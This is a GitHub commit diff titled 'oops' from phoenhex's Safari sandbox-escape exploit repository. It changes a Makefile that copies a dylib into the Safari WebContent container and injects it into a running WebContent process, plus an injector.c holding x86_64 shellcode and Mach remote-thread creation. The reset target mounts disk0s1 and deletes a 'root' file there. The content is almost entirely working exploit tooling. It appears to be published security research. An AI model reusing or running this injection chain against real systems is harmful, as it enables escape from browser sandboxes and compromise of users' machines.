oops

phoenhex · Dec 29, 2018 · eea4e31 · eea4e31
1 parent c37fde5
commit eea4e31
Show file tree

Hide file tree

Showing 3 changed files with 15 additions and 13 deletions.
diff --git a/exploits/safari-sbx/Makefile b/exploits/safari-sbx/Makefile
@@ -1,6 +1,7 @@
 #LIBPATH = /System/Library/
 LIBPATH = `python -c 'import os; print(os.confstr(65538))'`/com.apple.WebKit.WebContent+com.apple.Safari/
-TARGET1 = `python -c 'import os; print(os.confstr(65538))'`/com.apple.WebKit.WebContent+com.apple.Safari/com.apple.speech.awdd
+TARGET1 = `python -c 'import os; print(os.confstr(65538))'`/com.apple.WebKit.WebContent+com.apple.Safari/com.apple.speech.speechsynthesisd
+TARGET2 = `python -c 'import os; print(os.confstr(65538))'`/com.apple.speech.speechsynthesisd
 
 .PHONY: all inject inject_test restart_ssd reset clean
 all: injector webcontent.dylib
@@ -9,7 +10,7 @@ all: injector webcontent.dylib
 inject: injector webcontent.dylib
 	@[ ! -e /cores/log_webcontent_* ] || \
 	  	(echo /cores/log_webcontent_XXX exists. you should run make reset first; exit 1)
-	sudo cp case5.dylib $(LIBPATH)/webcontent.dylib
+	sudo cp webcontent.dylib $(LIBPATH)/webcontent.dylib
 	sudo chmod 755 $(LIBPATH)/webcontent.dylib
 	./inject_with_log_server.sh `pgrep WebContent | tail -n 1` $(LIBPATH)/webcontent.dylib
 
@@ -19,11 +20,18 @@ inject_test: injector test.dylib
 	./inject_with_log_server.sh `pgrep WebContent | tail -n 1` $(LIBPATH)/test.dylib
 
 restart_ssd:
-	killall -9 com.apple.awdd || true
-	swift case6.swift
+	killall -9 com.apple.speech.speechsynthesisd || true
+	swift restart_ssd.swift
 	pgrep speechsynthesisd
 
 reset: restart_ssd
+	sudo umount -f /dev/disk0s1 || true
+	mkdir -p /tmp/mnt
+	diskutil mount -mountPoint /tmp/mnt /dev/disk0s1
+	rm -f /tmp/mnt/root
+	diskutil umount /dev/disk0s1
+	#rm -rf $(TARGET1)
+	#rm -rf $(TARGET2)
 	rm -rf /cores/log_{webcontent,ssd1,ssd2}_*
 	for p in `pgrep WebContent`; do kill -9 $$p; done || true
 
@@ -37,8 +45,8 @@ bundle/%.plist.gen.h: bundle/%.plist
 %.dylib.gen.h: %.dylib
 	xxd -i $< $@
 
-test.dylib: oob.c
-	clang -shared $< -o $@
+test.dylib: test.c
+	clang -shared $< -o $@ -framework CoreFoundation -framework Security
 
 webcontent.dylib: webcontent.c bundle/Info.plist.gen.h bundle/version.plist.gen.h \
   			ssd1.dylib.gen.h ssd2.dylib.gen.h common.h

diff --git a/exploits/safari-sbx/inject_with_log_server.sh b/exploits/safari-sbx/inject_with_log_server.sh
@@ -4,8 +4,6 @@ if [[ $# != 2 ]]; then
 	exit 1
 fi
 
-echo "PID WEBPROCESS $1"
-
 PID="$1"
 DYLIB="$2"
 

diff --git a/exploits/safari-sbx/injector.c b/exploits/safari-sbx/injector.c
@@ -105,7 +105,7 @@ kern_return_t mach_vm_write
 //
 char injectedCode[] =
 #ifdef X86_64
-     //"\xcc"                           //  int3*/
+     /*"\xcc"                           //  int3*/
 
      "\x55"                           // pushq  %rbp
      "\x48\x89\xe5"                   // movq   %rsp, %rbp
@@ -419,10 +419,6 @@ kr = thread_create_running( remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE6
 
 if (kr != KERN_SUCCESS) { fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr));
 			  return (-3); }
-           else {
-		fprintf (stderr, "yolo\n");
-
-           }
 
 return (0);